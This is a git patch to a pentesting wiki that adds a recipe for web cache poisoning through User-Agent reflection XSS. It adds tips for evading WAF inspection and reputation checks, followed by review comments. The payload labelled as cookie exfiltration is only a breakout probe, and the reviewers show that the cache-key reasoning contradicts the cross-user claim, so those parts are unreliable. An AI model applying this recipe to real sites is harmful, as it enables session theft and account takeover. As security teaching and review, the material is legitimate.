From d6a776e9d03a17ad1de63960cdfd0f0afe00fa83 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 19 Aug 2025 01:31:47 +0000 Subject: [PATCH] Add content from: How I found a 0-Click Account takeover in a public BBP and l... --- src/pentesting-web/cache-deception/README.md | 43 +++++++++++++++++-- .../proxy-waf-protections-bypass.md | 23 ++++++++-- 2 files changed, 59 insertions(+), 7 deletions(-) diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md index 8a555208c..5af836d4c 100644 --- a/src/pentesting-web/cache-deception/README.md +++ b/src/pentesting-web/cache-deception/README.md 
@@ -172,6 +172,44 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul Example usage: `wcvs -u example.com` +### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js) + +This real-world pattern chains a header-based reflection primitive with CDN/WAF behavior to reliably poison the cached HTML served to other users: + +- The main HTML reflected an untrusted request header (e.g., `User-Agent`) into executable context. +- The CDN stripped cache headers but an internal/origin cache existed. The CDN also auto-cached requests ending in static extensions (e.g., `.js`), while the WAF applied weaker content inspection to GETs for static assets. +- Request flow quirks allowed a request to a `.js` path to influence the cache key/variant used for the subsequent main HTML, enabling cross-user XSS via header reflection. + +Practical recipe (observed across a popular CDN/WAF): + +1) From a clean IP (avoid prior reputation-based downgrades), set a malicious `User-Agent` via browser or Burp Proxy Match & Replace. +2) In Burp Repeater, prepare a group of two requests and use "Send group in parallel" (single-packet mode works best): + - First request: GET a `.js` resource path on the same origin while sending your malicious `User-Agent`. + - Immediately after: GET the main page (`/`). +3) The CDN/WAF routing race plus the auto-cached `.js` often seeds a poisoned cached HTML variant that is then served to other visitors sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`). + +Example header payload (to exfiltrate non-HttpOnly cookies): + +``` +User-Agent: Mo00ozilla/5.0" +``` + +Operational tips: + +- Many CDNs hide cache headers; poisoning may appear only on multi-hour refresh cycles. Use multiple vantage IPs and throttle to avoid rate-limit or reputation triggers. +- Using an IP from the CDN's own cloud sometimes improves routing consistency. 
+- If a strict CSP is present, this still works if the reflection executes in main HTML context and CSP allows inline execution or is bypassed by context. + +Impact: + +- If session cookies aren’t `HttpOnly`, zero-click ATO is possible by mass-exfiltrating `document.cookie` from all users who are served the poisoned HTML. + +Defenses: + +- Stop reflecting request headers into HTML; strictly context-encode if unavoidable. Align CDN and origin cache policies and avoid varying on untrusted headers. +- Ensure WAF applies content inspection consistently to `.js` requests and static paths. +- Set `HttpOnly` (and `Secure`, `SameSite`) on session cookies. + ## Vulnerable Examples ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577)) @@ -245,9 +283,8 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S - [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/) - [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) - [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/) +- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) +- [Burp Proxy Match & Replace](https://portswigger.net/burp/documentation/desktop/tools/proxy/match-and-replace) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md index 62ffec5fb..fd092f625 100644 
--- a/src/pentesting-web/proxy-waf-protections-bypass.md +++ b/src/pentesting-web/proxy-waf-protections-bypass.md @@ -131,7 +131,24 @@ By default, the WAF inspects only the first 8KB of a request. It can increase th Up to 128KB. -### Obfuscation +### Static assets inspection gaps (.js GETs) + +Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with `.js`), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses. + +Practical use cases: + +- Send payloads in untrusted headers (e.g., `User-Agent`) on a GET to a `.js` path to avoid content inspection, then immediately request the main HTML to influence the cached variant. +- Use a fresh/clean IP; once an IP is flagged, routing changes can make the technique unreliable. +- In Burp Repeater, use "Send group in parallel" (single-packet style) to race the two requests (`.js` then HTML) through the same front-end path. + +This pairs well with header-reflection cache poisoning. See: + +- {{#ref}} +cache-deception/README.md +{{#endref}} +- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) + +### Obfuscation ```bash # IIS, ASP Clasic 
@@ -223,9 +240,7 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) - [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g) - [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization) +- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) {{#include ../banners/hacktricks-training.md}} - - -
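Review bot: in the cache-deception README hunk (@@ -172,6 +172,44 @@), the line `Example header payload (to exfiltrate non-HttpOnly cookies):` is followed only by `User-Agent: Mo00ozilla/5.0"`, which closes a quoted context and exfiltrates nothing; either relabel it as the breakout probe used to confirm the reflection, or show the payload that actually reads `document.cookie`, which the Impact bullet depends on. Step 3 also undercuts the cross-user claim: if the cache varies on `User-Agent` ("same `Vary` dimensions like `User-Agent`"), the poisoned variant is keyed to the attacker's own header and no other visitor receives it; the technique only works when the reflected header is unkeyed, so that sentence should say the header is not part of the cache key. Lastly, "The CDN stripped cache headers but an internal/origin cache existed" should name which layer ends up holding the poisoned HTML, since the defense "Align CDN and origin cache policies" only makes sense once that is stated.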
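Review bot: in the cache-deception references hunk (@@ -245,9 +283,8 @@), the `[Burp Proxy Match & Replace]` documentation link belongs inline at step 1 of the recipe, where Match & Replace is first used, rather than in a reference list otherwise made of research write-ups; the new blog-post entry is fine where it is.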
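Review bot: in the proxy-waf-protections-bypass.md hunk (@@ -131,7 +131,24 @@), the sentence claiming a GET to a `.js` path can "deliver or seed malicious variants that affect subsequent HTML responses" states no mechanism: the reader cannot tell whether the cached object is the `.js` response (later loaded as script) or the HTML document, nor what links the two requests beyond "Send group in parallel". Spell out which response is cached and which input is unkeyed, or trim the paragraph to the inspection-gap observation, which is the point of this page. Also, the `{{#ref}}` block is written as a bullet (`- {{#ref}}`) with `cache-deception/README.md` and `{{#endref}}` on unindented continuation lines; confirm the preprocessor accepts a ref block inside a list item, or move it out of the list.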